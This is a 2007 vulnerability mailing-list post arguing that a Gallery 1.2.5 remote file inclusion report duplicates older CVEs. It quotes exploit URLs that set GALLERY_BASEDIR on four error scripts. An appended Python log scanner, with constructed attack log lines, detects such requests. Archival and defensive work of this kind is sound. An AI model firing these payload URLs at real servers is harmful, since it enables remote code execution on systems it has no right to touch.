[VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities

security curmudgeon jericho at attrition.org
Thu Apr 26 20:22:38 UTC 2007


: The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those
: posted back in 2002 by avart at gmx.de; eg,
: 
:   http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html
: 
: and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something?

Back when most of us called it 'command execution' and hadn't started
commonly calling this RFI =)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-1412

Gallery photo album package before 1.3.1 allows local and possibly remote 
attackers to execute arbitrary code via a modified GALLERY_BASEDIR 
variable that points to a directory or URL that contains a Trojan horse 
init.php script. 

(the associated mail list post shows the RFI vuln in captionator.php and 
references the vendor fix for errors/configmode.php, errors/needinit.php, 
errors/reconfigure.php, errors/unconfigured.php.)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-2123

PHP remote file inclusion vulnerability in publish_xp_docs.php for Gallery 
1.3.2 allows remote attackers to inject arbitrary PHP code by specifying a 
URL to an init.php file in the GALLERY_BASEDIR parameter. 

http://www.securityfocus.com/bid/23502/exploit

http://www.example.com/errors/needinit.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/reconfigure.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/unconfigured.php?GALLERY_BASEDIR=Shell
http://www.example.com/errors/configmode.php?GALLERY_BASEDIR=Shell 

(the four vendor-mentioned files)

http://milw0rm.com/exploits/3743

# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell

(the four vendor-mentioned files)


--

So, the CVE above isn't necessarily a dupe as it doesn't mention the
vulnerable files. If the CVE is expanded/overhauled, I'd guess they will
change it to mention the four files as well as the example RFI vuln in the
original disclosure, but it seems they could just as easily add it to
2002-2123?
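As an added example (not part of this post, and not Gallery's own code), detection logic a defender could run over web-server access logs for the four error scripts named above: it flags GALLERY_BASEDIR values that point at a remote URL or traverse out of the web root, the two shapes the CVE descriptions above cover. The log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The four Gallery 1.x scripts named in the vendor fix and in Bugtraq 23502 / milw0rm 3743.
GALLERY_ERROR_SCRIPTS = (
    "/errors/needinit.php",
    "/errors/reconfigure.php",
    "/errors/unconfigured.php",
    "/errors/configmode.php",
)

# Combined Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_basedir(value):
    """Return a short reason if a (URL-decoded) GALLERY_BASEDIR value looks attacker-controlled, else None."""
    v = value.strip()
    if re.match(r'^[a-z][a-z0-9+.-]*://', v, re.I):  # http://, ftp://, ... -> remote include of init.php
        return "remote URL"
    if v.startswith("//"):                            # scheme-relative URL, still remote
        return "scheme-relative URL"
    if ".." in v:                                     # traversal to a local file outside the install
        return "path traversal"
    if "\x00" in v:                                   # null byte to cut off the appended 'init.php'
        return "null byte"
    return None

def find_rfi_attempts(log_lines):
    """Return (client, script path, basedir value, reason) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(GALLERY_ERROR_SCRIPTS):  # Gallery may live under a prefix
            continue
        for value in parse_qs(parts.query).get("GALLERY_BASEDIR", []):  # parse_qs URL-decodes
            reason = classify_basedir(value)
            if reason:
                hits.append((client, parts.path, value, reason))
    return hits

# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Apr/2007:20:22:38 +0000] "GET /gallery/errors/needinit.php?GALLERY_BASEDIR=http://198.51.100.7/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Apr/2007:20:22:39 +0000] "GET /gallery/errors/configmode.php?GALLERY_BASEDIR=..%2F..%2F..%2Ftmp%2F HTTP/1.1" 200 512',
    '198.51.100.23 - - [26/Apr/2007:20:23:01 +0000] "GET /gallery/view_album.php?set_albumName=demo HTTP/1.1" 200 8192',
    '192.0.2.9 - - [26/Apr/2007:20:23:15 +0000] "GET /gallery/errors/reconfigure.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("%s -> %s GALLERY_BASEDIR=%r (%s)" % hit)
```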